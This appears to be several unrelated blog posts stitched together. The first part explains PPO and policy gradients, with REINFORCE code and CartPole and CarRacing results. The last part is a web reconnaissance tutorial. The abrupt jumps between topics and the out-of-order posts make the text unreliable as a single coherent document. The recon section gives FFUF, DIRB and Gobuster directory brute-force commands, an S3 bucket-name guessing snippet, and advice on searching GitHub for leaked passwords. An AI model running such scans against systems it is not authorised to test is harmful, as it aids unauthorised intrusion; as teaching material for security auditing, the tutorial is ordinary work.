First of all, since the policy gradient was touched upon in a previous post, it is assumed that the reader is somewhat familiar with the topic. Generally, policy gradient methods perform stochastic gradient ascent on an estimator of the policy gradient. The most common estimator is the following:

$$\hat{g} = \hat{\mathbb{E}}_t\left[\nabla_\theta\log\pi_\theta(a_t|s_t)\hat{A}_t \right]$$

In this formulation,

\(\pi_\theta\) is a stochastic policy;

\(\hat{A}_t\) is an estimator of the advantage function at timestep \(t\);

\(\hat{\mathbb{E}}_t\left[...\right]\) is the empirical average over a finite batch of samples in an algorithm that alternates between sampling and optimization.

For implementations of policy gradient methods, an objective function is constructed in such a way that the gradient is the policy gradient estimator. Therefore, said estimator can be calculated by differentiating the objective.

$$L^{PG}(\theta)=\hat{\mathbb{E}}_t\left[\log\pi_\theta(a_t|s_t)\hat{A}_t\right]$$

This objective function is also known as the policy gradient loss. If the advantage estimate is positive (i.e., the agent's actions in the sample trajectory resulted in a better-than-average return), the probability of selecting those actions again is increased. Conversely, if the advantage estimate is negative, the likelihood of selecting those actions again is decreased.
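In an autodiff framework such as PyTorch, this objective can be sketched in a few lines (a minimal illustration; `log_probs` and `advantages` are hypothetical tensors collected from a batch of sampled timesteps):

```python
import torch

def pg_loss(log_probs, advantages):
    # L^PG = mean over the batch of log pi(a_t|s_t) * A_t.
    # Negated because optimizers minimize, while we want to perform
    # gradient ascent on the objective.
    return -(log_probs * advantages).mean()

# Hypothetical batch: log-probs of the taken actions and their advantages
log_probs = torch.tensor([-0.5, -1.2, -0.3], requires_grad=True)
advantages = torch.tensor([1.0, -0.5, 2.0])
loss = pg_loss(log_probs, advantages)
loss.backward()  # gradients now hold the policy gradient estimate
```

Backpropagating through this loss yields exactly the estimator \(\hat{g}\) above.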

Continuously running gradient steps on the same batch of collected experience will push the neural network's parameters far outside the range in which the data was originally collected. Since the advantage function is only a noisy estimate of the true advantage, it becomes increasingly inaccurate as the policy moves away from the one that generated the data, to the point where it is completely wrong. Repeatedly optimizing on the same batch will therefore destroy the policy.

The trust region policy optimization algorithm (TRPO) addresses this by maximizing an objective function while imposing a constraint on the size of the policy update, so that a single update cannot stray too far from the old policy and destroy it.

$$\begin{align*} \max_\theta\,&\hat{\mathbb{E}}_t\left[\frac{\pi_\theta(a_t|s_t)}{\pi_{\theta_\text{old}}(a_t|s_t)}\hat{A}_t\right] \\ \text{subject to }&\hat{\mathbb{E}}_t\left[KL\left[\pi_{\theta_\text{old}}(\cdot|s_t), \pi_\theta(\cdot|s_t)\right]\right]\leq \delta \end{align*}$$

Here, \(\theta_{\text{old}}\) is the vector of policy parameters before the update.

The theory behind TRPO actually suggests using a penalty instead of a constraint, since the hard constraint adds additional overhead to the optimization process and can sometimes lead to very undesirable training behavior. With a penalty, the former constraint is included directly in the optimization objective:

$$\max_{\theta}\hat{\mathbb{E}}_t\left[\frac{\pi_\theta(a_t|s_t)}{\pi_{\theta_\text{old}}(a_t|s_t)}\hat{A}_t-\beta\,KL\left[\pi_{\theta_\text{old}}(\cdot|s_t), \pi_\theta(\cdot|s_t)\right]\right]$$

That being said, TRPO itself uses a hard constraint instead of a penalty, because the coefficient \(\beta\) turns out to be very tricky to set to a single value that performs well across different problems.

Therefore, PPO introduces additional modifications that make it possible to optimize the objective with stochastic gradient descent; choosing a fixed penalty coefficient \(\beta\) alone is not enough.

Say \(r_t(\theta)\) is the probability ratio between the new updated policy and the old policy:

$$r_t(\theta) = \frac{\pi_\theta(a_t|s_t)}{\pi_{\theta_\text{old}}(a_t|s_t)}$$

$$\Rightarrow r_t(\theta_\text{old})=1.$$

So given a sequence of sampled action-state pairs, this \(r_t(\theta)\) value will be larger than 1 if the action is more likely now than it was in \(\pi_{\theta_{\text{old}}}\). On the other hand, if the action is less probable now than before the last gradient step, \(r_t(\theta)\) will be somewhere between 0 and 1.
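In code, the ratio is usually computed from stored log-probabilities rather than raw probabilities, since subtracting log-probs and exponentiating is numerically more stable (a sketch; the tensors are hypothetical batch data, not values from our experiments):

```python
import torch

# Log-probabilities of the taken actions under the old policy (stored
# during rollout) and under the current policy (recomputed each update).
logp_old = torch.tensor([-0.7, -1.5, -0.2])
logp_new = torch.tensor([-0.5, -1.5, -0.4])

# r_t(theta) = pi_new / pi_old = exp(log pi_new - log pi_old)
ratio = torch.exp(logp_new - logp_old)
# Where logp_new == logp_old (as before the first gradient step),
# the ratio equals 1; ratios above 1 mean the action got more likely.
```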

Multiplying this ratio \(r_t(\theta)\) with the estimated advantage function yields a more readable version of the normal TRPO objective function, the so-called "surrogate" objective:

$$L^{CPI}(\theta) = \hat{\mathbb{E}}_t\left[\frac{\pi_\theta(a_t|s_t)}{\pi_{\theta_\text{old}}(a_t|s_t)}\hat{A}_t\right]=\hat{\mathbb{E}}_t\left[r_t(\theta)\hat{A}_t\right]$$

Maximizing this \(L^{CPI}\) without any further constraint would result in an excessively large policy update, which, as already explained, might end up destroying the policy. Therefore, Schulman et al. suggest penalizing changes to the policy that move \(r_t(\theta)\) too far away from 1, which leads to the final objective:

$$L^{CLIP}(\theta) = \hat{\mathbb{E}}_t\left[\min\left(r_t(\theta)\hat{A}_t,\ \text{clip}(r_t(\theta),1-\epsilon,1+\epsilon)\hat{A}_t\right)\right]$$

Basically, this objective is a pessimistic bound on the unclipped objective: it takes the minimum of the normal unclipped objective \(L^{CPI}\) and a clipped version of it. The clipped term discourages moving \(r_t\) outside of the interval \([1 - \epsilon, 1 + \epsilon]\). Two insightful figures are provided in the paper, helping to illustrate this concept.

The first graph shows the case where, for a single timestep t in \(L^{CPI}\), the selected action turned out better than expected; the second shows the case where the chosen action had a negative effect on the result. For a positive advantage, the objective flattens out for values of r that are too high: if an action was good and is now much more likely than it was under the old policy \(\pi_{\theta_\text{old}}\), the clipping prevents an overly large update based on just a single estimate, which, given the noisy nature of the advantage estimate, might otherwise destroy the policy. For terms with a negative advantage, the clipping likewise avoids over-adjusting, since that might drive the likelihood of those actions to zero and damage the policy in the same way, just in the opposite direction.

If, however, the advantage function is negative and *r* is large, meaning the chosen action was bad and is much more probable now than it was in the old policy \(\pi_{\theta_\text{old}}\), then it would be beneficial to reverse the update. And, as it so happens, this is the only case in which the unclipped version has a lower value than the clipped version, and it is favored by the minimum operator. This really showcases the finesse of PPO's objective function.
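Putting the pieces together, the clipped surrogate objective can be sketched in PyTorch as follows (a minimal illustration of the loss term only, not the full PPO update loop; `eps` plays the role of \(\epsilon\)):

```python
import torch

def clipped_surrogate_loss(logp_new, logp_old, advantages, eps=0.2):
    ratio = torch.exp(logp_new - logp_old)                  # r_t(theta)
    unclipped = ratio * advantages                          # r_t * A_t
    clipped = torch.clamp(ratio, 1 - eps, 1 + eps) * advantages
    # Pessimistic bound: elementwise minimum, negated because the
    # optimizer minimizes while we want to maximize the objective.
    return -torch.min(unclipped, clipped).mean()

# A single timestep where the action became much more likely (ratio 1.8)
# with positive advantage: the clipped term (1.2 * A_t) wins the minimum.
loss = clipped_surrogate_loss(
    logp_new=torch.log(torch.tensor([0.9])),
    logp_old=torch.log(torch.tensor([0.5])),
    advantages=torch.tensor([1.0]),
)
```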

As an alternative, or in addition, to the clipped surrogate objective, Schulman et al. provide another concept: the adaptive KL penalty coefficient. The general idea is to penalize the KL divergence and to adapt the penalty coefficient based on the most recent policy updates. The procedure can be divided into two steps:

- First the policy is updated over several epochs by optimizing the KL-penalized objective:

$$L^{KLPEN}(\theta) = \hat{\mathbb{E}}_t\left[\frac{\pi_\theta(a_t|s_t)}{\pi_{\theta_\text{old}}(a_t|s_t)}\hat{A}_t - \beta\, KL[\pi_{\theta_\text{old}}(\cdot|s_t), \pi_\theta(\cdot|s_t)]\right]$$

- Then \(d\) is computed as \(d = \hat{\mathbb{E}}_t[KL[\pi_{\theta_\text{old}}(\cdot|s_t), \pi_\theta(\cdot|s_t)]]\) to finally update the penalty coefficient \(\beta\) based on some target value of the KL divergence \(d_\text{targ}\):

if \(d<\frac{d_\text{targ}}{1.5}: \beta \leftarrow \beta/2\)

if \(d>d_\text{targ} \times 1.5: \beta \leftarrow \beta\times2\)

This method seems to generally perform worse than the clipped surrogate objective; however, it is included simply because it still makes for an important baseline.

Also note that, while the parameters 1.5 and 2 are chosen heuristically, the algorithm is not particularly sensitive to them and the initial value of \(\beta\) is not relevant because the algorithm quickly adjusts it anyway.
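The adaptation rule above is simple enough to sketch directly (a minimal illustration of the two cases; in a real training loop this would run once per policy update):

```python
def update_beta(beta, d, d_targ):
    # Heuristic rule from the paper: halve beta if the measured KL
    # divergence d is well below the target, double it if well above.
    if d < d_targ / 1.5:
        beta = beta / 2
    elif d > d_targ * 1.5:
        beta = beta * 2
    return beta
```

For example, with `d_targ = 0.01`, a measured divergence of 0.001 halves \(\beta\), while 0.05 doubles it; anything in between leaves \(\beta\) unchanged.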

To test PPO, we applied the algorithm to several gym environments. Please note that the PPO implementation used here originates from the Stable-Baselines3 GitHub repository.

This environment might be familiar from previous posts in this series. To quickly summarize: a pole is attached by an unactuated joint to a cart, and the agent has an action space of two, applying force to the left (-1) or to the right (+1). The agent receives a reward of +1 each timestep as long as neither of the following conditions is met: the cart's x position exceeds 2.4 units in either direction, or the pole is more than 15 degrees from vertical. Otherwise, the episode ends.

We trained a PPO agent for 15000 timesteps on the environment. The agent reached the perfect mean reward of 500 for CartPole-v1 after only approximately 7500 timesteps of training.

Since gym allows for modification of its environments, we created a custom version of CartPole named CartPole-v1k that extends the maximum number of timesteps per episode from 500 (CartPole-v1) to 1000. Of course, this means that the maximum reward for an episode also increases to 1000. As shown in the following figure, the PPO agent trained on this new environment reached the maximum reward a little later, after about 8500 timesteps.
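The modified environment can be created by re-registering CartPole's entry point under a new id with a longer time limit (a sketch using gym's registration API; the id `CartPole-v1k` is our own naming):

```python
import gym
from gym.envs.registration import register

# Same underlying dynamics as CartPole-v1, but episodes may run for
# up to 1000 timesteps instead of 500.
register(
    id="CartPole-v1k",
    entry_point="gym.envs.classic_control:CartPoleEnv",
    max_episode_steps=1000,
)

env = gym.make("CartPole-v1k")
```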

The standard deviation of the reward across the 100 episodes of each evaluation step also declines to 0 within the first 8500 timesteps, meaning the agent reaches the maximum reward in every single episode after that point, without fail.

Interestingly, the old model trained on the original environment also reached a reward of 1000 on the modified version in all 100 evaluation episodes (mean reward of 1000 with a standard deviation of 0). It seems safe to say that the agent not only reached its maximum reward after about 7500 timesteps but also perfected the act of balancing the pole over the next few thousand iterations.

This environment consists of a racing car attempting to maneuver a race track. Observations comprise a 96x96-pixel image, and the action space contains three actions: steering, accelerating, and braking. Each frame incurs a negative reward of -0.1, while completion of a track section is rewarded with +1000/N, where N is the total number of track sections. Thus, the final reward for completing the track is 1000 minus 0.1 times the number of frames it took the agent. An episode ends when the car finishes the entire track or leaves the playfield.

Yet again, we trained a PPO agent, this time over half a million timesteps. Although the mean reward did not fully stabilize over the training period, since the agent kept trying out new and sometimes weaker strategies, the best model achieved a mean reward of 600 over 50 episodes of evaluation.

This agent was already able to navigate the track and only occasionally oversteered in curves, causing it to leave the track. The following graphic visualizes the 500,000-timestep learning period.

In this post, we have looked at the Proximal Policy Optimization algorithm and its performance on two popular gym environments. We applied PPO to CartPole-v1 and a modified version of it, named CartPole-v1k, where the maximum number of timesteps per episode was increased from 500 to 1000. We trained a separate agent on the Car Racing environment and achieved a mean reward of 600 over 50 evaluation episodes.

PPO is an ideal tool to use with complex, continuous environments such as those discussed in this post. This algorithm operates reliably and efficiently, allowing us to create more sophisticated agents that are capable of outperforming their predecessors. With such powerful reinforcement learning algorithms now available, the possibilities for creating autonomous agents that can successfully interact with their environment are virtually limitless. We look forward to exploring more complex environments and scenarios in future posts.

Those of you familiar with neural networks will probably have heard of stochastic gradient descent. The goal of stochastic gradient descent is to compute the gradient of a loss function to then adjust the parameters of the network and minimize the loss function by stepping in the opposite direction of the gradient.

We can utilize the very similar stochastic gradient ascent to approach reinforcement learning problems. To this end, we define a reward function \(J(\theta)\) measuring the quality of our policy \(\pi_{\theta}\). In reinforcement learning this is quite natural, since the framework inherently provides rewards \(r\). Thus, the reward function is chosen to be the expected return of a trajectory \(\tau\) generated by the current policy \(\pi_{\theta}\). Let \(G(\tau)\) be the infinite-horizon discounted return, starting at the first timestep, for the trajectory \(\tau\).

The derivations of the policy gradient using finite-horizon or undiscounted returns are almost identical; for a finite horizon \(T\), simply replace all \(\infty\) with \(T\).

$$G(\tau) = \sum_{t = 1}^\infty \gamma^t r_{t+1}$$

$$J(\theta) = \mathop{\mathbb{E}}_{\tau \sim \pi_\theta} [ G(\tau) ]$$

If we can now calculate the gradient of the reward function \(\nabla_\theta J(\theta)\), we can take a stochastic gradient ascent step, scaled by a learning-rate hyperparameter \(\alpha\), to maximize the reward function:

$$\theta = \theta + \alpha \nabla_\theta J(\theta) $$

The only problem remaining is to determine what the gradient \(\nabla_\theta J(\theta)\) looks like.

**Step 1:**

To compute \(\mathbb{E}[X]\), we sum over all possible values of \( X=x\), which are weighted by their probability \( P(x)\). In other words, \( \mathbb{E}[X] = \sum_x P(x) x\).

If we sum over all possible trajectories \(\tau\), we can do something similar for \(J(\theta)\) by relying on the probability that \(\tau\) occurs given policy \(\pi_\theta\).

$$J(\theta) = \sum_\tau P(\tau | \theta) G(\tau)$$

$$\nabla_\theta J(\theta) = \nabla_\theta \mathop{\mathbb{E}}_{\tau \sim \pi_\theta} [ G(\tau) ]$$

$$\nabla_\theta J(\theta) = \nabla_\theta \sum_\tau P(\tau | \theta) G(\tau) = \sum_\tau \nabla_\theta P(\tau | \theta) G(\tau) $$

**Step 2:**

Given a function \(f(x)\), the log-derivative trick is useful for rewriting the derivative \(\frac{d}{dx} f(x)\) and relies upon the derivative of \(\log(x)\) being \(\frac{1}{x}\) and the chain rule.

$$\frac{d}{dx} f(x) = f(x) \frac{1}{f(x)} \frac{d}{dx} f(x) = f(x)\frac{d}{dx} \log(f(x)) $$

Since \(G(\tau)\) is independent of \(\theta\), we can apply this trick to rewrite \(\nabla_\theta P(\tau | \theta)\):

$$\nabla_\theta J(\theta) = \sum_\tau \nabla_\theta P(\tau | \theta) G(\tau) = \sum_\tau P(\tau | \theta) \nabla_\theta \log(P(\tau | \theta)) G(\tau) $$

**Step 3:**

We still need an equation for \(P(\tau | \theta)\), but we can find it by thinking of the problem as a Markov decision process (MDP). Let's say that \(p(s_1)\) is the probability of starting a trajectory in state \(s_1\). Then, we can express \(P(\tau | \theta)\) by multiplying together the probabilities for each occurrence of all states \(s_t\) and actions \(a_t\).

$$P(\tau | \theta) = p(s_1) \prod_{t = 1}^\infty P(s_{t+1} | s_t, a_t)\, \pi_\theta(a_t | s_t)$$

$$\log(P(\tau | \theta)) = \log(p(s_1)) + \sum_{t = 1}^\infty \big( \log(P(s_{t+1} | s_t, a_t)) + \log(\pi_\theta(a_t | s_t))\big) $$

**Step 4:**

Please note that \(p(s_1)\) and \(P(s_{t+1} | s_t, a_t)\) are also not affected by \(\theta\).

$$ \nabla_\theta \log(P(\tau | \theta)) = \sum_{t = 1}^\infty \nabla_\theta \log(\pi_\theta(a_t | s_t))$$

$$\nabla_\theta J(\theta) = \sum_\tau P(\tau | \theta) \sum_{t = 1}^\infty \nabla_\theta \log(\pi_\theta(a_t | s_t)) G(\tau) $$

We can now reverse the first step, leaving us with the final equation that can be estimated by sampling multiple trajectories and taking the mean gradients for the sampled trajectories.

$$\nabla_\theta J(\theta) = \mathop{\mathbb{E}}_{\tau \sim \pi_\theta} \left[ \sum_{t = 1}^\infty \nabla_\theta \log(\pi_\theta(a_t | s_t)) G(\tau) \right]$$

In reinforcement learning problems, probability distributions such as \(\pi_\theta(a|s)\), \(P(\tau | \theta)\), and \(P(s_{t+1} | s_t, a_t)\) are constantly at play. Since these are all normalized by definition, for any such distribution \(P_\theta(x)\) this means:

$$1 = \sum_x P_\theta(x).$$

If we now take the gradient of both sides and use the log-derivative trick, we get:

$$\nabla_\theta 1 = \nabla_\theta \sum_x P_\theta(x) $$ $$0 = \sum_x \nabla_\theta P_\theta(x) $$

$$0 = \sum_x P_\theta(x) \nabla_\theta \log(P_\theta(x))$$ $$0 = \mathop{\mathbb{E}}_{x \sim P_\theta(x)} \left[ \nabla_\theta \log(P_\theta(x)) \right]$$
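This identity is easy to verify numerically for a small categorical distribution, here a softmax over three logits (a self-contained sketch; the logit values are arbitrary):

```python
import torch

# Softmax policy over three outcomes, parameterized by logits theta.
theta = torch.tensor([0.2, -1.0, 0.5], requires_grad=True)
probs = torch.softmax(theta, dim=0)  # P_theta(x), normalized by construction

# E_{x ~ P_theta}[ grad_theta log P_theta(x) ], computed exactly by
# summing over all outcomes weighted by their probabilities.
expected_grad = torch.zeros_like(theta)
for x in range(3):
    grad_x = torch.autograd.grad(torch.log(probs[x]), theta, retain_graph=True)[0]
    expected_grad = expected_grad + probs[x].detach() * grad_x
# expected_grad is (numerically) the zero vector
```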

This lemma, in combination with the rules for the expected value, yields the following given a state \(s_t\) and an arbitrary function \(b(s_t)\) only dependent on the state:

$$\mathop{\mathbb{E}}_{a_t \sim \pi_\theta(a_t | s_t)} \left[ \nabla_\theta \log(\pi_\theta(a_t | s_t))\, b(s_t) \right] = b(s_t) \cdot \mathop{\mathbb{E}}_{a_t \sim \pi_\theta(a_t | s_t)} \left[ \nabla_\theta \log(\pi_\theta(a_t | s_t)) \right] = b(s_t) \cdot 0 = 0 $$

Since the expected value of this expression is \(0\), we can freely add or subtract it from the policy gradient equation. In this case, the function \(b(s_t)\) is called a baseline. One common baseline is the value function \(V^{\pi_{\theta}}(s_t)\), as this reduces the variance when approximating the equation through sampling, thus helping us to determine the gradient with greater accuracy.

$$\nabla_\theta J(\theta) = \mathop{\mathbb{E}}_{\tau \sim \pi_\theta} \left[ \sum_{t = 1}^\infty \nabla_\theta \log(\pi_\theta(a_t | s_t)) (G(\tau) - b(s_t)) \right] $$

$$\nabla_\theta J(\theta) = \mathop{\mathbb{E}}_{\tau \sim \pi_\theta} \left[ \sum_{t = 1}^\infty \nabla_\theta \log(\pi_\theta(a_t | s_t)) (G(\tau) - V^{\pi_{\theta}}(s_t)) \right]$$

This alteration requires a way to calculate \(V^{\pi_{\theta}}(s_t)\), which is most often done using a second neural network trained to approximate \(V^{\pi_{\theta}}(s_t)\) as closely as possible.
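Such a value network can be sketched as a small MLP trained by regression on sampled returns (a minimal illustration; the architecture, hidden size, and loss are our own assumptions, not a prescribed design):

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class ValueNetwork(nn.Module):
    """Small MLP mapping a state to a scalar estimate of V^pi(s)."""
    def __init__(self, num_inputs, hidden_size=128):
        super().__init__()
        self.linear1 = nn.Linear(num_inputs, hidden_size)
        self.linear2 = nn.Linear(hidden_size, 1)

    def forward(self, state):
        x = F.relu(self.linear1(state))
        return self.linear2(x).squeeze(-1)

# Regression: fit the predicted values to sampled returns G(tau).
value_net = ValueNetwork(num_inputs=4)
states = torch.randn(8, 4)   # hypothetical batch of states
returns = torch.randn(8)     # hypothetical sampled returns
loss = F.mse_loss(value_net(states), returns)
loss.backward()
```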

The generalized form of policy gradient with finite-horizon and undiscounted return is defined as:

$$\nabla_\theta J(\pi_\theta) = \mathop{\mathbb{E}}_{\tau \sim \pi_\theta} \big[\sum^T_{t=0}\nabla_\theta \log \pi_\theta(a_t|s_t)G(\tau) \big]$$

The components of this expression were already defined above in the derivation section, albeit for the infinite horizon. To obtain the alternate forms of this expression, we replace \(G(\tau)\) with \(\Phi_t\):

$$\nabla_\theta J(\pi_\theta) = \mathop{\mathbb{E}}_{\tau \sim \pi_\theta} \big[\sum^T_{t=0}\nabla_\theta \log \pi_\theta(a_t|s_t)\Phi_t \big]$$

We can now use \(\Phi_t\) to form alternate expressions that yield the same expected value. The simplest choice is the full return itself, \(\Phi_t = G(\tau) = R(\tau)\). Furthermore, \(R(\tau)\) can be replaced by the reward-to-go \(\sum_{t'=t}^{T}R(s_{t'},a_{t'},s_{t'+1})\). The reason is that \(R(\tau)\) sums all rewards that were obtained, including those from before the action was taken; however, past rewards should not influence the reinforcement of the action. Consequently, it is only sensible to consider the rewards that come after the action being reinforced: \(\Phi_t = \sum^T_{t'=t}R(s_{t'},a_{t'},s_{t'+1})\).
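The reward-to-go sums can be computed in a single backward pass over the episode (a small sketch; `rewards` is a hypothetical list of per-step rewards):

```python
def rewards_to_go(rewards):
    # rtg[t] = sum of rewards from timestep t to the end of the episode
    rtg = [0.0] * len(rewards)
    running = 0.0
    for t in reversed(range(len(rewards))):
        running += rewards[t]
        rtg[t] = running
    return rtg

# Later actions are only credited with the rewards that follow them:
# rewards_to_go([1.0, 2.0, 3.0]) -> [6.0, 5.0, 3.0]
```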

The on-policy action value function \(Q^\pi(s,a) = \mathop{\mathbb{E}}_{\tau \sim \pi_\theta} \big[R(\tau)|s_0=s, a_0=a\big]\), which gives the expected return when starting in state \(s\) and taking action \(a\), can also be expressed as \(\Phi_t\). This is proven using the law of iterated expectations, resulting in:

$$\nabla_\theta J(\pi_\theta) = \mathop{\mathbb{E}}_{\tau \sim \pi_\theta} \big[\sum^T_{t=0}\nabla_\theta \log \pi_\theta(a_t|s_t) Q^{\pi_{\theta}}(s_t,a_t) \big]$$

The advantage function, \(A^\pi(s,a) = Q^\pi(s,a)- V^\pi(s)\), which measures the advantage of an action over the other available actions, is justified in the same way as the action-value function and can also be inserted into the policy gradient expression:

$$\nabla_\theta J(\pi_\theta) = \mathop{\mathbb{E}}_{\tau \sim \pi_\theta} \big[\sum^T_{t=0}\nabla_\theta \log \pi_\theta(a_t|s_t) A^{\pi_{\theta}}(s_t,a_t) \big]$$

All of these expressions have one thing in common: they have the same expected value of the policy gradient, even though they differ in form.

To gain a better understanding of these underlying concepts, we will introduce REINFORCE, a popular policy gradient algorithm. The core idea of this algorithm is to estimate the return using Monte-Carlo methods based on sampled episodes and to use those estimates to update the policy \(\pi\). The following pseudocode generates full sample trajectories; the return \(G_t\) estimated from these trajectories can then be used to update the policy parameters \(\theta\), thanks to the already-introduced equality between the expectation of the sample gradient and the actual gradient.

Initialize the policy parameter \(\theta\) at random.

Generate one trajectory on policy \(\pi_\theta: S_1, A_1, R_2, S_2, A_2, ..., S_T\)

For \(t=1, 2, ..., T:\)

Estimate the return \(G_t\);

Update policy parameters: \(\theta \leftarrow \theta + \alpha\gamma^t G_t \nabla_\theta \log \pi_\theta\left( A_t | S_t \right)\)

To get a better understanding, a code example for OpenAI Gym's CartPole environment is provided.

```
import sys
import gym
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import matplotlib.pyplot as plt

# Constants
GAMMA = 0.9


class PolicyNetwork(nn.Module):
    def __init__(self, num_inputs, num_actions, hidden_size, learning_rate=3e-4):
        super(PolicyNetwork, self).__init__()
        self.num_actions = num_actions
        self.linear1 = nn.Linear(num_inputs, hidden_size)
        self.linear2 = nn.Linear(hidden_size, num_actions)
        self.optimizer = optim.Adam(self.parameters(), lr=learning_rate)

    def forward(self, state):
        x = F.relu(self.linear1(state))
        x = F.softmax(self.linear2(x), dim=1)
        return x

    def get_action(self, state):
        state = torch.from_numpy(state).float().unsqueeze(0)
        probs = self.forward(state)
        # Sample an action from the categorical distribution given by the policy
        action = np.random.choice(self.num_actions, p=np.squeeze(probs.detach().numpy()))
        log_prob = torch.log(probs.squeeze(0)[action])
        return action, log_prob


def update_policy(policy_network, rewards, log_probs):
    # Compute the discounted return G_t for every timestep of the episode
    discounted_rewards = []
    for t in range(len(rewards)):
        Gt = 0
        pw = 0
        for r in rewards[t:]:
            Gt = Gt + GAMMA**pw * r
            pw = pw + 1
        discounted_rewards.append(Gt)

    # Normalize the returns to reduce the variance of the gradient estimate
    discounted_rewards = torch.tensor(discounted_rewards)
    discounted_rewards = (discounted_rewards - discounted_rewards.mean()) / (discounted_rewards.std() + 1e-9)

    # Gradient ascent on log pi * G_t == gradient descent on -log pi * G_t
    policy_gradient = []
    for log_prob, Gt in zip(log_probs, discounted_rewards):
        policy_gradient.append(-log_prob * Gt)

    policy_network.optimizer.zero_grad()
    policy_gradient = torch.stack(policy_gradient).sum()
    policy_gradient.backward()
    policy_network.optimizer.step()


def main():
    env = gym.make('CartPole-v0')
    policy_net = PolicyNetwork(env.observation_space.shape[0], env.action_space.n, 128)

    max_episode_num = 5000
    max_steps = 10000
    numsteps = []
    avg_numsteps = []
    all_rewards = []

    for episode in range(max_episode_num):
        state = env.reset()
        log_probs = []
        rewards = []

        for steps in range(max_steps):
            env.render()
            action, log_prob = policy_net.get_action(state)
            new_state, reward, done, _ = env.step(action)
            log_probs.append(log_prob)
            rewards.append(reward)

            if done:
                update_policy(policy_net, rewards, log_probs)
                numsteps.append(steps)
                avg_numsteps.append(np.mean(numsteps[-10:]))
                all_rewards.append(np.sum(rewards))
                sys.stdout.write("episode: {}, total reward: {}, average_reward: {}, length: {}\n".format(
                    episode, np.round(np.sum(rewards), decimals=3),
                    np.round(np.mean(all_rewards[-10:]), decimals=3), steps))
                break

            state = new_state

    plt.plot(numsteps)
    plt.plot(avg_numsteps)
    plt.xlabel('Episode')
    plt.show()


if __name__ == '__main__':
    main()
```

The environment consists of a pole attached to a cart via a joint, with forces that can be applied to the cart in both horizontal directions. The goal is to keep the pole upright (less than 15 degrees from vertical) for as long as possible (timesteps are limited to 200 for this training). The agent receives a reward of +1 for each timestep in which it keeps the pole from falling over and the cart from moving more than 2.4 units away from the center.

Policy Gradient is an efficient Reinforcement Learning (RL) method that, in contrast to previously introduced methods like Q-Learning, does not need to analyze the entire action space, and thus avoids the curse of dimensionality.

Automated content discovery, or ACD, is the process of finding and extracting content from websites automatically. The procedure is automated because it frequently entails hundreds, thousands, or even millions of requests to a web server. Using these requests, malicious individuals and organizations may be able to obtain information such as usernames and passwords. The end goal is to gain access to resources we didn't know existed before. Wordlists aid in accomplishing this objective by allowing us to check whether a file or directory exists on a website.

**What are Wordlists?**

Wordlists are collections of words that can be used to find information on the internet, such as usernames, passwords, and other sensitive data. The benefit of using wordlists is that they are easy to use and can be very effective in finding the information you're looking for. An excellent source of wordlists is SecLists, maintained by Daniel Miessler.

**Automation Tools**

There are a number of different automation tools that can be used for hacking purposes. Some of these tools include FFUF, DIRB, and Gobuster.

FFUF is an open-source web fuzzing program for finding components and content within web applications, as well as web servers. What do I mean by this? When you visit a website, you're likely to see the material that the site's owner wants to offer you, such as an index page like index.php. However, content worth testing may exist outside of what is publicly linked. For example, the owner of the website may have content hosted at /admin.php that you both want to know about and test. FFUF is a tool that can help find those items for your perusal.

**Example using wordlists with FFUF:**

```
user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://IP/
```

**Source:** FFUF Source

DIRB is a web content scanner. It searches for existing (and/or hidden) web objects by launching a dictionary-based attack against a web server and analyzing the responses.

It comes with built-in preconfigured attack wordlists, but you may also use your own wordlists. DIRB can also operate as a traditional CGI scanner, but keep in mind that it is primarily a content scanner, not a vulnerability scanner.

The primary goal of this tool is to assist in professional web application auditing. It addresses areas that traditional web vulnerability scanners may miss: in particular, it searches for specific web objects that other generic CGI scanners overlook. It doesn't search for vulnerabilities, nor does it look for web content that might be vulnerable.

**Example using wordlists with DIRB:**

```
user@machine$ dirb http://IP/ /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
```

**Source:** DIRB Source

Gobuster is a directory and file brute-forcing scanner written in Go. Brute-force scanners such as DirBuster and DIRB work well against popular directories, but they can often be slow and error-prone. Gobuster is a Go-based alternative to these tools, available as a command-line program. The major advantage of Gobuster over other directory scanners is its speed.

**Example using wordlists with Gobuster:**

```
user@machine$ gobuster dir --url http://IP/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
```

**Source:** Gobuster Source

In this article, we discussed the basics of automated content discovery and some of the tools that are available to help with this process. We also took a look at how wordlists can be used to find sensitive information on the internet. Stay tuned for future articles in which we will discuss more hacking tools and techniques!

Google hacking / dorking takes advantage of Google's sophisticated search engine capabilities, which let you pick out very specific content. For example, you may use the site: filter to select only results from a specific domain name (for example, webpage.com). You can then combine this with certain search terms, such as admin (webpage.com admin), which will only show results from the webpage.com website that include the term admin. You may also combine multiple filters.

For more information check the following Wikipedia webpage: https://en.wikipedia.org/wiki/Google_hacking

Wappalyzer is a cross-platform utility that uncovers the technologies used on websites. It can identify content management systems (CMS), e-commerce platforms, frameworks, payment processors, web servers, and other technology-related features.

For more information check the following website: https://www.wappalyzer.com/

The Wayback Machine is a historical archive created by the Internet Archive. It stores copies of websites and allows users to browse through them. The Wayback Machine can be used to view past versions of websites or to track changes over time. You can look up a domain name and see how often the service scraped the web page and stored the content. This service can be used to find out if any old pages remain on the current website.

For more information check the following website: https://archive.org/web/

GitHub is a web-based hosting service for software development projects. It allows users to share code repositories, track changes, and collaborate on projects. GitHub can be used to find open-source code snippets, connectors, and other tools that may be useful in investigations or business analysis.

You may use GitHub's search function to look for company names or website names in the hopes of finding repositories linked to your objective. You may discover source code, passwords, or other information that you didn't already have after it's been discovered.

S3 Buckets are cloud-based storage services offered by Amazon. They allow users to store files and data in the cloud. The file's owner may restrict access to only those people who have permission to view or modify the data. These settings are sometimes incorrect and unintentionally allow access to files that should not be accessible to the general public. S3 buckets are accessible at http(s)://{name}.s3.amazonaws.com, where {name} is chosen by the owner. There are many ways to discover S3 buckets. For example, you may look for URLs in the website's page source, GitHub repositories, or even automate the process.
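The bucket-name guessing part of that process can be sketched in a few lines (the company name and suffix list are illustrative guesses, not a real target; actually probing the generated URLs is left out):

```python
# Generate candidate S3 bucket URLs for a target organization.
# The suffixes reflect common naming patterns; the list is illustrative only.
def candidate_buckets(name, suffixes=("", "-dev", "-staging", "-backup", "-assets")):
    return ["https://{}{}.s3.amazonaws.com".format(name, s) for s in suffixes]

for url in candidate_buckets("example"):
    print(url)
```

Each candidate URL could then be requested to see whether the bucket exists and what access it allows.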
